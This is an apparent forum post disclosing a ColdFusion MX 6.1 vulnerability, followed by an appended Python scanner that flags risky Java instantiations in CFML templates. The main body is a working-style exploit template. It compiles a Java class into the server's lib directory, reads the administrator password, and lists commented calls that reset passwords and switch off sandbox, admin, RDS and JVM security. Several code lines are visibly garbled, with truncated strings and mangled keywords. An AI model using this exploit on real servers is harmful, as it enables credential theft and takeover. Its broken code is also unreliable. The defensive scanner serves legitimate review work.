Macromedia ColdFusion MX 6.1 vulnerability



There is a vulnerability in the ColdFusion MX 6.1 product. To exploit this, a user needs access to create a ColdFusion template on a ColdFusion server with CreateObject or cfobject tags enabled. The code given below writes a Java class to the ColdFusion lib directory, which allows writing by default. This code compiles the Java file, but there are other ways to write the class file if the compiler class is not available. Once the class is written, it can be accessed by CF and all methods exposed. A user can do a variety of things like getting the administrator password. Code and examples are given below.

  Quote
Software: Macromedia ColdFusion MX 6.1

Platform Tested: Windows/Linux

Version Tested: ColdFusion MX 6.1

<cfscript>

objFileWriter = CreateObject("java","java.io.FileWriter");

objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");

objJavaC = CreateObject("java","sun.tools.javac.Main");

objString = CreateObject("java","java.lang.String");

objFile = CreateObject("java","java.io.File");

if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }

strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";

strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";

strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";

strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";

fileWriter = objFileWriter.init("#strJavaSource#",false

fileWriter.write("importfusion.security.SecurityManager;");

fileWriter.write("importjavajava.io.File;");

fileWriter.write("publics SecurityExploit extends SecurityManager {");

fileWriter.write("publicrityExploit(File arg0, File arg1) {");

fileWriter.write("super(arg01); }");

fileWriter.write("publicean isAdminSecurityEnabled(){");

fileWriter.write("returne;}}");

fileWriter.flush();

fileWriter.close();

str = objString.init("-classpath,#strCfusionJar#,#strJavaSource

strArr = str.split(",");

byteArray = objByteArray.init();

compileObj =objJavaC.init(byteArray,str);

compileObj.compile(strArr);

obj = CreateObject("java","SecurityExploit");

file1 = objFile.init("#strNeoSecFile

file2 = objFile.init("#strPasswdFile

obj.init(file1,file2);

obj.load();

</cfscript>

<cfscript>

// Get Administrator Password

strAdminPw = obj.getAdminPassword();

// Set Administrator Password

//obj.setAdminPassword("test123");

// Turn off Sandbox Security

//obj.setSandboxSecurityEnabled(false);

// Turn off Administrator Login

//obj.setAdminSecurityEnabled(false);

// Turn off RDS Login

//obj.setRdsSecurityEnabled(false);

// Set RDS Password

//obj.setRdsPassword("test123");

// Turn off JVM Security

//obj.setJvmSecurityEnabled(false);

</cfscript>

<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>

Edited by jorgeivan2k3
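
A review aid for the precondition the post describes (templates allowed to use CreateObject or cfobject with Java classes), added here as an example and not part of the original post: it lists Java instantiations in a CFML template and flags the file and compiler classes the post's template relies on, plus any class with no package name. The names HIGH_RISK, classify and scan_template are hypothetical, and java.lang.Runtime and java.lang.ProcessBuilder are assumed additions to the list.

```python
import re

# Classes used by the post's template, plus two assumed additions
# (java.lang.Runtime, java.lang.ProcessBuilder). Compared in lower case.
HIGH_RISK = {
    "java.io.filewriter", "java.io.file", "sun.tools.javac.main",
    "java.lang.runtime", "java.lang.processbuilder",
}
CREATEOBJECT = re.compile(
    r"""CreateObject\(\s*["']java["']\s*,\s*["']([^"']+)["']""", re.I)
CFOBJECT = re.compile(r"<cfobject\b[^>]*>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*["']([^"']*)["']""")

def classify(class_name):
    """'high' for file/compiler/process classes and for classes with no
    package (such as one dropped into the server's lib directory)."""
    if class_name.lower() in HIGH_RISK or "." not in class_name:
        return "high"
    return "review"

def scan_template(text):
    """Return (line_number, class_name, severity) per Java instantiation."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in CREATEOBJECT.finditer(line):
            findings.append((line_no, m.group(1), classify(m.group(1))))
        for tag in CFOBJECT.finditer(line):
            attrs = {k.lower(): v for k, v in ATTR.findall(tag.group(0))}
            if attrs.get("type", "").lower() == "java" and "class" in attrs:
                cls = attrs["class"]
                findings.append((line_no, cls, classify(cls)))
    return findings

# Constructed sample template, not taken from a real application.
SAMPLE = '''<cfscript>
w = CreateObject("java","java.io.FileWriter");
c = createobject( 'java' , 'sun.tools.javac.Main' );
s = CreateObject("java","java.lang.String");
o = CreateObject("java","SecurityExploit");
</cfscript>
<cfobject type="Java" class="java.util.HashMap" name="m" action="create">
<cfobject type="com" class="Word.Application" name="w">
'''

if __name__ == "__main__":
    for line_no, cls, sev in scan_template(SAMPLE):
        print(f"line {line_no}: {cls} [{sev}]")
```

Run over a template directory, the "high" findings are the ones to check against who is allowed to deploy templates and whether the lib directory is still writable by the server account.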